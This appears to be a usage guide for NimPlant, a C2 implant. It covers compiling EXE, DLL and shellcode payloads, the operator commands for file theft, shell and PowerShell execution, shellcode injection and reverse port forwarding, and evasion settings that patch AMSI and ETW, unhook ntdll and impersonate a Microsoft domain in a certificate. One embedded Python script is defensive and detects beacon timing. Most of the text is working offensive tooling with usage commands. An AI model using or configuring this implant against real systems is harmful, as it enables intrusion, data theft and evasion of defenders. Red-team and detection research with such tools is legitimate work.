
NimPlant

NimPlant is a lightweight, cross-platform command and control (C2) implant written in Nim. It provides HTTP/HTTPS communication, configurable sleep intervals, file operations, and shellcode execution.

Disclaimer: This tool is intended solely for authorized security testing and red team engagements. Unauthorized use against systems you do not own or do not have explicit permission to test is illegal and unethical. Always obtain written authorization before conducting offensive security operations.

Installation

Server Setup

# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant

# Install Python dependencies for the server
pip install -r server/requirements.txt

# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh

# Install Nim dependencies
nimble install -y winim nimcrypto zippy

Compile the Implant

# Edit configuration before compiling
nano config.toml

# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe

# Compile as DLL
python3 NimPlant.py compile -o dll

# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode

# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile

Server Operations

Starting the Server

# Start the NimPlant C2 server
python3 NimPlant.py server

# Server starts listening on configured port
# Web UI available at https://server-ip:port/

Managing Implants

# In the NimPlant server console:

# List active implants
nimplant> list

# Interact with a specific implant
nimplant> interact <implant-id>

# View implant details
nimplant> info

# Kill an implant
nimplant> kill

Commands

Reconnaissance

# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env

# List running processes
nimplant> ps

# Get current working directory
nimplant> pwd

# List directory contents
nimplant> ls C:\Users

File Operations

# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt

# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt

# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir

# Remove a file
nimplant> rm C:\Windows\Temp\file.exe

# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt

# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt

Execution

# Execute a shell command
nimplant> shell net user

# Execute a command via cmd.exe
nimplant> cmd /c dir C:\

# Run PowerShell command
nimplant> powershell Get-Process

# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2

# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin

Network Operations

# List network connections
nimplant> netstat

# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80

# Stop reverse port forward
nimplant> rportfwd stop 8080

Sleep and Communication

# Change sleep interval (seconds)
nimplant> sleep 30

# Change sleep jitter (percentage)
nimplant> jitter 40

# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40
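Because sleepTime and sleepJitter determine how regularly the implant polls taskPath, the same two parameters are what a defender looks for in proxy or firewall logs. The following is an added example, not NimPlant code, that scores each source/destination pair by how regular its request gaps are; the log format, addresses and timestamps are constructed, and the 50% tolerance is an assumption chosen to cover typical jitter settings.

```python
# Added example (not NimPlant code): flag src/dst pairs whose requests arrive
# with the regular sleepTime +/- sleepJitter cadence described above.
from collections import defaultdict
from datetime import datetime
from statistics import median
# Constructed proxy log: "<ISO timestamp> <src> <dst> <uri>". 10.0.0.5 polls
# about every 10s with ~20% jitter; 10.0.0.9 is irregular browsing.
SAMPLE_LOG = """\
2025-01-10T09:00:00 10.0.0.5 203.0.113.7 /api/register
2025-01-10T09:00:10 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:00:18 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:00:30 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:00:39 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:00:51 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:01:00 10.0.0.5 203.0.113.7 /api/task
2025-01-10T09:00:01 10.0.0.9 198.51.100.4 /index.html
2025-01-10T09:00:02 10.0.0.9 198.51.100.4 /style.css
2025-01-10T09:00:47 10.0.0.9 198.51.100.4 /news
2025-01-10T09:03:10 10.0.0.9 198.51.100.4 /about
2025-01-10T09:03:11 10.0.0.9 198.51.100.4 /logo.png
"""

def parse_log(text):
    """Group request timestamps by (src, dst)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _uri = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows

def beacon_score(times, max_jitter_pct=50):
    """Return (median gap in seconds, fraction of gaps within +/-max_jitter_pct
    of that median). Human traffic scores low; a sleep loop scores near 1."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 3:
        return None, 0.0
    med = median(gaps)
    tol = med * max_jitter_pct / 100
    return med, sum(1 for g in gaps if abs(g - med) <= tol) / len(gaps)

def find_beacons(text, min_requests=5, min_regular=0.8):
    """Return {(src, dst): (median_gap, regular_fraction)} for beacon-like flows."""
    hits = {}
    for flow, times in parse_log(text).items():
        if len(times) >= min_requests:
            med, frac = beacon_score(times)
            if med is not None and frac >= min_regular:
                hits[flow] = (med, frac)
    return hits
```

On the constructed log, only the 10.0.0.5 flow is reported, with a median gap of 9.5 seconds and every gap inside the tolerance; raising sleepTime or sleepJitter widens the spread but does not remove the underlying periodicity.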

HTTPS Communication

# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
  -days 365 -nodes -subj "/CN=cdn.microsoft.com"

# Place certificates in the server directory
cp server.key server/
cp server.crt server/

OPSEC Considerations

# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)

# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection

Evasion Configuration

# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true

Logging

# Server logs all interactions
# Logs stored in: server/logs/

# View engagement log
cat server/logs/nimplant.log

# Each implant session has its own log
ls server/logs/sessions/

Cleanup

# Terminate all active implants
nimplant> killall

# Individual implant cleanup
nimplant> interact <id>
nimplant> kill

# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill